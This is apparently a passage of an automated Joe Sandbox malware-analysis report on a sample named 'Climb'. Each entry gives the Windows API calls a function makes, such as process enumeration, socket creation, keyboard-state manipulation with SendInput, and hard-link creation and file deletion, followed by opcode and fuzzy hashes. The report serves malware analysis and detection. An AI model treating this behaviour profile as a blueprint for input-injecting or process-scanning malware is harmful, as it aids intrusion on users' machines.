                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressFreeLibraryProc
                                                                                                                                                                      • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                      • API String ID: 3013587201-2590602151
                                                                                                                                                                      • Opcode ID: e8c446c5321159ac1b5ac79280fe6586273ee90d74151eb1cd34f468123fa30d
                                                                                                                                                                      • Instruction ID: 99de39592c0b17ee7aa01685c1384d8241218154d821b18882ba40e8208eb5a2
                                                                                                                                                                      • Opcode Fuzzy Hash: e8c446c5321159ac1b5ac79280fe6586273ee90d74151eb1cd34f468123fa30d
                                                                                                                                                                      • Instruction Fuzzy Hash: A3E02B719026119FD77156205C8AFEA3FA87F20B14F250D58EC41F6090DB34CC88C764
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: c39a7a99a2e8618106ff9bfde652132dc4649d755a16b5f0d28db604adec9ff2
                                                                                                                                                                      • Instruction ID: 668b797fdde0b76f740a13e155e69d48eb37c89d92203e6e8681d5400fc7b69a
                                                                                                                                                                      • Opcode Fuzzy Hash: c39a7a99a2e8618106ff9bfde652132dc4649d755a16b5f0d28db604adec9ff2
                                                                                                                                                                      • Instruction Fuzzy Hash: A9C19E75A00206EFCB14CF94C8A4EAEBBB5FF48715F109599E805EB291D730EE85DB90
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __alldvrm$_strrchr
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1036877536-0
                                                                                                                                                                      • Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                      • Instruction ID: 7f2c6a685799c65f44405e8b7789113a9c0536fe24ddcda2b2005973b5eb49d5
                                                                                                                                                                      • Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                      • Instruction Fuzzy Hash: 32A157729007A69FDB11DF18E8917AEBFE4FF62310F1445A9E5959B2C1C2349981CF90
                                                                                                                                                                      APIs
                                                                                                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00590BD4,?), ref: 00550EE0
                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00590BD4,?), ref: 00550EF8
                                                                                                                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,0058DCE0,000000FF,?,00000000,00000800,00000000,?,00590BD4,?), ref: 00550F1D
                                                                                                                                                                      • _memcmp.LIBVCRUNTIME ref: 00550F3E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 314563124-0
                                                                                                                                                                      • Opcode ID: 0077424b23d58709d71a8bee73e5be3d73b1f11b39c0b2d438eb0821f75c8d53
                                                                                                                                                                      • Instruction ID: 44d68695076eb3df186581109e43e0c94ab8f582ea1b6ca80fe7b9d459c23618
                                                                                                                                                                      • Opcode Fuzzy Hash: 0077424b23d58709d71a8bee73e5be3d73b1f11b39c0b2d438eb0821f75c8d53
                                                                                                                                                                      • Instruction Fuzzy Hash: AC81FC71A00109EFCB14DFD4C994DEEBBB9FF89315F204559E906AB290DB71AE09CB60
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0057B10C
                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0057B11A
                                                                                                                                                                        • Part of subcall function 004FB329: _wcslen.LIBCMT ref: 004FB333
                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 0057B1FC
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0057B20B
                                                                                                                                                                        • Part of subcall function 0050E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00534D73,?), ref: 0050E395
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1991900642-0
                                                                                                                                                                      • Opcode ID: 14d2d9537ee0ef9bf09b8ff1190246982e1ddd9574e615a8115eb3108f47d986
                                                                                                                                                                      • Instruction ID: f3ed0b4290df7042f1f7c7f9798de4997c5046b8f3f48597eee6f20491e2a8a6
                                                                                                                                                                      • Opcode Fuzzy Hash: 14d2d9537ee0ef9bf09b8ff1190246982e1ddd9574e615a8115eb3108f47d986
                                                                                                                                                                      • Instruction Fuzzy Hash: 93517C71508305AFD310EF25C886A6FBBE8FF89758F40491EF58997291DB34D904CB92
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                      • Opcode ID: 7f36457e5f319f74a49b91c19b8e0ed7ec5cc17c4d1b7f91366d4a05a74a6680
                                                                                                                                                                      • Instruction ID: ad7777c7623b6c86fbff6cca73848d1f4862a4738abe6a4cbd81c329324d0a7b
                                                                                                                                                                      • Opcode Fuzzy Hash: 7f36457e5f319f74a49b91c19b8e0ed7ec5cc17c4d1b7f91366d4a05a74a6680
                                                                                                                                                                      • Instruction Fuzzy Hash: 4D415D31600912ABEB207FBD9C4AABE7FA4FF82370F180635F819D62D1DA354C41576A
                                                                                                                                                                      APIs
                                                                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 0057255A
                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 00572568
                                                                                                                                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 005725E7
                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 005725F1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$socket
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1881357543-0
                                                                                                                                                                      • Opcode ID: 81a7fffc2d6d7fc4eea14e368ddc3fffdeae5f3473414bc9c07e10a05c65e209
                                                                                                                                                                      • Instruction ID: e2d67f82e054b8ca2fed43fd62e6a890f431ac676c37040c9a74f1dbaf88a971
                                                                                                                                                                      • Opcode Fuzzy Hash: 81a7fffc2d6d7fc4eea14e368ddc3fffdeae5f3473414bc9c07e10a05c65e209
                                                                                                                                                                      • Instruction Fuzzy Hash: 64410434A00200AFE720AF24C886F2A3BE5BB44718F94C44DFA199F2D2C775ED41CB91
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00586D1A
                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00586D4D
                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00586DBA
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3880355969-0
                                                                                                                                                                      • Opcode ID: 182d9235fc982fbc43d3d5ba0d3cf10d574c35a5dc2ede12c282e2d951096e63
                                                                                                                                                                      • Instruction ID: 113596b728e99152caf547606a5f1ebe2208cc84357537dbc28f6c9df377031f
                                                                                                                                                                      • Opcode Fuzzy Hash: 182d9235fc982fbc43d3d5ba0d3cf10d574c35a5dc2ede12c282e2d951096e63
                                                                                                                                                                      • Instruction Fuzzy Hash: 89512A74A01209EFCF24EF64D980AAE7BB6FF54320F208559FD55AB290D770AD81DB90
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f6cd11bb808e08261650171903a7fae37913c8b48ffb5070a69f52826fa0fc04
                                                                                                                                                                      • Instruction ID: 34dc93df13fe6b39335e84b9265317be682b9851d8a8163c9f48c2b124251d43
                                                                                                                                                                      • Opcode Fuzzy Hash: f6cd11bb808e08261650171903a7fae37913c8b48ffb5070a69f52826fa0fc04
                                                                                                                                                                      • Instruction Fuzzy Hash: 20410475A00714AFE724AF78DC45BAABFE8FF89710F10852AF115DB2D1D37299418B80
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 005661C8
                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 005661EE
                                                                                                                                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00566213
                                                                                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0056623F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3321077145-0
                                                                                                                                                                      • Opcode ID: c5d5b34da23313536d451643b5f620eeded888e404748dec4cd126f0dc21481d
                                                                                                                                                                      • Instruction ID: a11ba167d9f0477ad4877b7bcebd12d2323366d3cec9675a24c567f1228e426e
                                                                                                                                                                      • Opcode Fuzzy Hash: c5d5b34da23313536d451643b5f620eeded888e404748dec4cd126f0dc21481d
                                                                                                                                                                      • Instruction Fuzzy Hash: D6415B39600615DFCF10EF15C585A29BBE2FF99714B088489E94AAF362CB34FC01DB95
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0055B473
                                                                                                                                                                      • SetKeyboardState.USER32(00000080), ref: 0055B48F
                                                                                                                                                                      • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0055B4FD
                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0055B54F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 432972143-0
                                                                                                                                                                      • Opcode ID: ad129ae28871c564b5dc62b52ada89ea6260ff59093d06f8b5f6b8b2ed5ab6a7
                                                                                                                                                                      • Instruction ID: 1f42c38aa85d27fb8f2903784a1e77d28dba4f1c156242bd2964ea3a23940fba
                                                                                                                                                                      • Opcode Fuzzy Hash: ad129ae28871c564b5dc62b52ada89ea6260ff59093d06f8b5f6b8b2ed5ab6a7
                                                                                                                                                                      • Instruction Fuzzy Hash: 2D313970A40208EEFF348B25882DBFA7FB6BB54312F04421BEC95961D2E375994D9761
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 0055B5B8
                                                                                                                                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 0055B5D4
                                                                                                                                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 0055B63B
                                                                                                                                                                      • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 0055B68D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 432972143-0
                                                                                                                                                                      • Opcode ID: 2c33e2c9557906b704602ed0f69f1486575c55191e2c8e7ad6ed9d1b56ecaffd
                                                                                                                                                                      • Instruction ID: 086cdf40905f1bc223be678f763402822284b14407d023c188272f18db2339a3
                                                                                                                                                                      • Opcode Fuzzy Hash: 2c33e2c9557906b704602ed0f69f1486575c55191e2c8e7ad6ed9d1b56ecaffd
                                                                                                                                                                      • Instruction Fuzzy Hash: 9F312D30940608AEFF308B65882D7FABFB6BF95312F04422BEC81561D1D374CA4D9B61
                                                                                                                                                                      APIs
                                                                                                                                                                      • ClientToScreen.USER32(?,?), ref: 005880D4
                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0058814A
                                                                                                                                                                      • PtInRect.USER32(?,?,?), ref: 0058815A
                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 005881C6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1352109105-0
                                                                                                                                                                      • Opcode ID: 87ba861d2ea7945418ad2fa435537868307b4ddb3cc1b4169c26a3deb353a45e
                                                                                                                                                                      • Instruction ID: cce46bdf4cee264d4bbf90c55b3e1d080da41eccb7fd9d6d701d115d03e44287
                                                                                                                                                                      • Opcode Fuzzy Hash: 87ba861d2ea7945418ad2fa435537868307b4ddb3cc1b4169c26a3deb353a45e
                                                                                                                                                                      • Instruction Fuzzy Hash: 8E418D30A01215DFCB11EF58C888EB9BBF5FF55710F9441A8ED54AB2A1CF70A886DB50
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 00582187
                                                                                                                                                                        • Part of subcall function 00554393: GetWindowThreadProcessId.USER32(?,00000000), ref: 005543AD
                                                                                                                                                                        • Part of subcall function 00554393: GetCurrentThreadId.KERNEL32 ref: 005543B4
                                                                                                                                                                        • Part of subcall function 00554393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00552F00), ref: 005543BB
                                                                                                                                                                      • GetCaretPos.USER32(?), ref: 0058219B
                                                                                                                                                                      • ClientToScreen.USER32(00000000,?), ref: 005821E8
                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 005821EE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2759813231-0
                                                                                                                                                                      • Opcode ID: e7a206146a791c3acd9009b8d5e1868c75f9b23e3cd520e21bca4fd273f56fc6
                                                                                                                                                                      • Instruction ID: f01bca5204f1d13ec9d7a9b8bb54fe1aff63b1d76a1c2f2df96051f57f4ab09c
                                                                                                                                                                      • Opcode Fuzzy Hash: e7a206146a791c3acd9009b8d5e1868c75f9b23e3cd520e21bca4fd273f56fc6
                                                                                                                                                                      • Instruction Fuzzy Hash: 493161B1D0010DAFDB04EFA6C885CAEBBF8FF58308B50846EE915E7211D6759E45CBA0
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004F41EA: _wcslen.LIBCMT ref: 004F41EF
                                                                                                                                                                      • _wcslen.LIBCMT ref: 0055E8E2
                                                                                                                                                                      • _wcslen.LIBCMT ref: 0055E8F9
                                                                                                                                                                      • _wcslen.LIBCMT ref: 0055E924
                                                                                                                                                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0055E92F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3763101759-0
                                                                                                                                                                      • Opcode ID: a12b86801b97d58e8fedf706f1be5dfcc6c2fc826323f25dbfbe8c25bd39b4bf
                                                                                                                                                                      • Instruction ID: 55b81c4016ccf9d2cf54766db1ddb97a5f567cc231cb8f12832740a8deebe2f4
                                                                                                                                                                      • Opcode Fuzzy Hash: a12b86801b97d58e8fedf706f1be5dfcc6c2fc826323f25dbfbe8c25bd39b4bf
                                                                                                                                                                      • Instruction Fuzzy Hash: BE21D675900215AFDB10AFA8C986BEEBBF8FF85350F104066E804BB281D6749E41CBE1
                                                                                                                                                                      APIs
